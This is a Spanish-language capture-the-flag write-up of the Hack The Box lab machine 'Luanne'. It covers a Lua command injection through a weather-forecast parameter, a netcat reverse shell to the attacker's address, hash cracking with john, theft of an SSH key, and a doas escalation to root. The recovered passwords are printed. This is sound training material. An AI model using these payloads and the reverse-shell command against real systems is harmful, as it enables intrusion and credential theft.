# Luanne

**OS**: Linux \
**Dificultad**: Fácil \
**Puntos**: 20

## Resumen
- Supervisor
- LUA Remote Code Execution
- Hash cracking (John)
- Netstat / Curl
- Netpgp
- Doas

## Nmap Scan

`nmap -sV -sC -p- 10.10.10.218`

```
Nmap scan report for 10.10.10.218
Host is up (0.066s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey: 
|   3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
|   521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_  256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp   open  http    nginx 1.19.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=.
| http-robots.txt: 1 disallowed entry 
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open  http    Medusa httpd 1.12 (Supervisor process manager)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd
```

## Enumeración

Enumerando el puerto 80 encontramos el archivo **robots.txt** que contiene el directorio **/weather**, pero no muestra nada al consultarlo, usando **gobuster** nos arroja el directorio **/forecast**.

`http://10.10.10.218/robots.txt`

![1](img/1.png)

`gobuster dir -u http://10.10.10.218/weather -w /usr/share/wordlists/dirb/big.txt -x html,txt -t 40`

![2](img/2.png)

Al consultar la nueva ruta nos muestra **No city specified. Use 'city=list' to list available cities**, agregando el parámetro en la URL nos enumera una lista de ciudades.

`http://10.10.10.218/weather/forecast?city=list`

![3](img/3.png)

Ya que no se puede obtener nada importante por el momento consultamos el puerto **9001** el cual está ejecutando el servicio **Supervisor**, leyendo la [documentación](http://supervisord.org/configuration.html) vemos que el usuario por defecto es **user:123**, con esas credenciales es posible acceder a la aplicación.

![4](img/4.png)

Accediendo a la parte de procesos se visualiza que la aplicación web en el puerto 80 está ejecutando lenguaje de programación **lua**.

`http://10.10.10.218:9001/tail.html?processname=processes`

![5](img/5.png)

### LUA Remote Code Execution

Ahora que sabemos que está ejecutando código lua, empezamos a jugar con el parámetro **city** y con ayuda de [GTFOBins](https://gtfobins.github.io/gtfobins/lua/) es posible obtener ejecución de código.

`http://10.10.10.218/weather/forecast?city=London');os.execute("cat+/etc/passwd")--`

![6](img/6.png)

Con esto en mente podemos obtener una reverse shell, ponemos a la escucha nuestro netcat y mandamos la siguiente petición.

```
http://10.10.10.218/weather/forecast?city=London');os.execute("rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.156+1234+>/tmp/f")--
```

![7](img/7.png)

`rlwrap nc -lvnp 1234`

![8](img/8.png)

## Escalada de Privilegios (User)

Dentro del servidor esta el archivo **.htpasswd** que contiene un hash.

`cat /var/www/.htpasswd`

![9](img/9.png)

Podemos descifrar el hash con la herramienta john.

`john hash.txt -wordlist=/usr/share/wordlists/rockyou.txt`

![10](img/10.png)

Revisando los puertos locales se encuentra abierto el **3001** que parece interesante.

`netstat -ant`

![11](img/11.png)

Haciendo una consulta con el comando curl no es posible acceder, pero proporcionando las credenciales que se descifraron anteriormente podemos consultar la aplicación web.

`curl http://127.0.0.1:3001/`

![12](img/12.png)

Después de probar varias cosas es posible obtener la llave privada del usuario **r.michaels** para conectarnos por SSH.

`curl --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/id_rsa`

![13](img/13.png)

Copiamos la llave, le cambiamos los permisos y nos conectamos.

- `chmod 400 id_rsa`
- `ssh -i id_rsa r.michaels@10.10.10.218`

![14](img/14.png)

## Escalada de Privilegios (Root)

Revisando los archivos en el directorios se encuentra un backup cifrado en **/home/r.michaels/backups**.

`ls -la /home/r.michaels/backups`

![15](img/15.png)

Investigando podemos usar el comando **netpgp** para descifrar el archivo y extraer su contenido.

`netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup-2020-09-16.tar.gz`

![16](img/16.png)

Extraemos el contenido de **devel_backup-2020-09-16.tar.gz** y vemos que hay otra archivo **.htpasswd** que contiene otro hash diferente.

- `cd /tmp`
- `tar -xf devel_backup-2020-09-16.tar.gz`
- `cd devel-2020-09-16/www`
- `cat .htpasswd`

![17](img/17.png)

Repitiendo el proceso anterior obtenemos otro password.

`john hash2.txt -wordlist=/usr/share/wordlists/rockyou.txt`

![18](img/18.png)

Probando el password es posible autenticarse como **root** usando el comado **doas**, ya que es un sistema openbsd.

```
root:littlebear
```

`doas -u root /bin/sh`

![19](img/19.png)

## Referencias
http://supervisord.org/configuration.html \
https://gtfobins.github.io/gtfobins/lua/ \
https://man.netbsd.org/netpgp.1 \
https://man.openbsd.org/doas.1